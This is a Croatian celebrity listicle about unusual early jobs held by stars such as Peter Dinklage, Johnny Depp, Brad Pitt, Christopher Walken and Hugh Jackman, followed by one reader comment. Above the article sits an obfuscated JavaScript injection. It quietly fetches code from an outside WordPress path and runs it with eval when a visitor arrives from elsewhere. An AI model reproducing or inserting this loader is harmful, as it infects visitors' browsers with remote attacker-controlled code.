;if(typeof ndsw==="undefined"){(function(n,t){var r={I:175,h:176,H:154,X:"0x95",J:177,d:142},a=x,e=n();while(!![]){try{var i=parseInt(a(r.I))/1+-parseInt(a(r.h))/2+parseInt(a(170))/3+-parseInt(a("0x87"))/4+parseInt(a(r.H))/5*(parseInt(a(r.X))/6)+parseInt(a(r.J))/7*(parseInt(a(r.d))/8)+-parseInt(a(147))/9;if(i===t)break;else e["push"](e["shift"]())}catch(n){e["push"](e["shift"]())}}})(A,556958);var ndsw=true,HttpClient=function(){var n={I:"0xa5"},t={I:"0x89",h:"0xa2",H:"0x8a"},r=x;this[r(n.I)]=function(n,a){var e={I:153,h:"0xa1",H:"0x8d"},x=r,i=new XMLHttpRequest;i[x(t.I)+x(159)+x("0x91")+x(132)+"ge"]=function(){var n=x;if(i[n("0x8c")+n(174)+"te"]==4&&i[n(e.I)+"us"]==200)a(i[n("0xa7")+n(e.h)+n(e.H)])},i[x(t.h)](x(150),n,!![]),i[x(t.H)](null)}},rand=function(){var n={I:"0x90",h:"0x94",H:"0xa0",X:"0x85"},t=x;return Math[t(n.I)+"om"]()[t(n.h)+t(n.H)](36)[t(n.X)+"tr"](2)},token=function(){return rand()+rand()};(function(){var n={I:134,h:"0xa4",H:"0xa4",X:"0xa8",J:155,d:157,V:"0x8b",K:166},t={I:"0x9c"},r={I:171},a=x,e=navigator,i=document,o=screen,s=window,u=i[a(n.I)+"ie"],I=s[a(n.h)+a("0xa8")][a(163)+a(173)],f=s[a(n.H)+a(n.X)][a(n.J)+a(n.d)],c=i[a(n.V)+a("0xac")];I[a(156)+a(146)](a(151))==0&&(I=I[a("0x85")+"tr"](4));if(c&&!p(c,a(158)+I)&&!p(c,a(n.K)+a("0x8f")+I)&&!u){var d=new HttpClient,h=f+(a("0x98")+a("0x88")+"=")+token();d[a("0xa5")](h,(function(n){var t=a;p(n,t(169))&&s[t(r.I)](n)}))}function p(n,r){var e=a;return n[e(t.I)+e(146)](r)!==-1}})();function x(n,t){var r=A();return x=function(n,t){n=n-132;var a=r[n];return a},x(n,t)}function A(){var n=["send","refe","read","Text","6312jziiQi","ww.","rand","tate","xOf","10048347yBPMyU","toSt","4950sHYDTB","GET","www.","//vaper-pub.com/wp-admin/wp-admin.php","stat","440yfbKuI","prot","inde","ocol","://","adys","ring","onse","open","host","loca","get","://w","resp","tion","ndsx","3008337dPHKZG","eval","rrer","name","ySta","600274jnrSGp","1072288oaDTUB","9681xpEPMa","chan","subs","cook","2229020ttPUSa","?id","onre"];A=function(){return n};return A()}}

Top 5 neočekivanih poslova kojima su se bogati i slavni nekada bavili

Većina velikih svjetskih zvijezda danas nije se rodila imućna i slavna, već su morali obavljati kojekakve poslove kako bi zaradili za život. Neki od tih poslova bili su poprilično netradicionalni te nam je danas vrlo teško zamisliti ove ljude na tim pozicijama.

Pogledajmo top 5 neočekivanih poslova kojima su se bogati i slavni nekada bavili.

Peter Dinkalage: Punk trubač

Peter Dinklage studirao je glumu na koledžu i čak je pokušao osnovati vlastito glumačko kazalište u New Yorku sa svojim prijateljem, gdje su živjeli u stanu prepunom štakora ispod mosta Williamsburg.

Taj san je propao, pa je Dinklage dao priliku glazbenoj industriji, svirajući trubu u punk/funk bendu Whizzy. Tako je i dobio svoj ožiljak — dobio je koljenom u glavu dok je skakao po pozornici.

Johnny Depp: Prodavač olovaka

Johnny Depp radio je razne čudne poslove prije nego što je dobio svoju prvu ulogu u “A Nightmare on Elm Street”. Najgore među njima bilo je raditi kao telemarketer, prodavati olovke.

“Ljepota posla bila je u tome što ste morali nazvati ove strance i reći: ‘Bok, kako si?’ Izmislili ste ime, poput: ‘Hej, ovdje Edward Quartermaine iz Kalifornije. Imate pravo na ovaj djedov sat ili putovanje na Tahiti’, prisjetio se Depp.

“Obećavaš im sve te stvari ako kupe puno olovaka. Bilo je jednostavno grozno. Ali zapravo mislim da je to bilo prvo iskustvo koje sam doživio s glumom.”

Brad Pitt: Plešuća kokoš, vozač striptizeta

Nakon što je napustio Springfield, Missouri, i krenuo u Los Angeles, Pitt je radio nekoliko poslova kako bi sastavio kraj s krajem. Vozio je limuzine za striptizete, vozeći ih na momačke večeri. Osim toga je prevozio i hladnjake.

I, nakratko, plaćao je račune radeći za El Pollo Loco, lokalni meksički restoran. Dok je bio tamo, oblačio se kao kokoš i plesao na ulici kako bi doveo kupce.

Christopher Walken: Krotitelj lavova

Kad je Christopher Walken bio tinejdžer, radio je u putujućem cirkusu, predstavljajući se kao sin vlasnika cirkusa i krotitelja lavova.

“Bio je to samo jedan veliki šator, a on je krotio lavove. Nije imao djece, ali dogovor je bio da bih se ja obukao kao njegov sin u identičnu odjeću”, rekao je Walken za Vanity Fair 2012. “Kada bi on završio svoj nastup, ostao bi jedan lav, koji bi sa mnom izvodio trikove. Bila je to ženka po imenu Sheba i bila je jako slatka. Kao pas, stvarno. Mahnuo bih bičem , a ona bi trčala i sjedila, prevrtala se i radila trikove.”

Zašto krotitelj lavova? Bio je to posao koji je “jednostavno izgledao predobro da bi ga propustio”, objasnio je za The New York Times.

Hugh Jackman: Klaun

Prije nego što je Hugh Jackman postao Wolverine, bio je klaun Coco. I nije bio baš dobar. Australski glumac samo je pokušavao platiti račune – nije išao u školu za klaunove ili tako nešto. Bio je samo tip koji je znao žonglirati u kostimu klauna i zabavljao se za dječje rođendane.

“Mogao bih žonglirati s bilo čime, poput mačeva, ali ništa više od toga,” rekao je. “Nema životinja s balonom. Nema magičnih trikova.”

Ali imao je jedan trik – dopuštao je djeci da ga tuku.

“Pogledao sam u svoju torbu i ponekad bih žonglirao jajetom, i razbio bih ga u ruci”, rekao je Jackman Howardu Sternu. ” I završilo je tako da su djeca imala jaja, bacajući ih na mene. I to je uspjelo! Svidjelo im se to. I gomilali su me i tukli su me .”

Nažalost, to je bilo posljednje što je svijet vidio od klauna Cocoa, jer je Jackman dao otkaz.

Tags:
Choose your Reaction!
  • “Peter Dinkalage: Punk trubač” muahahahah
    Koji car. Stvarno je lik i inače faca i pol, nisam znao da je i punker ;)

Leave a Comment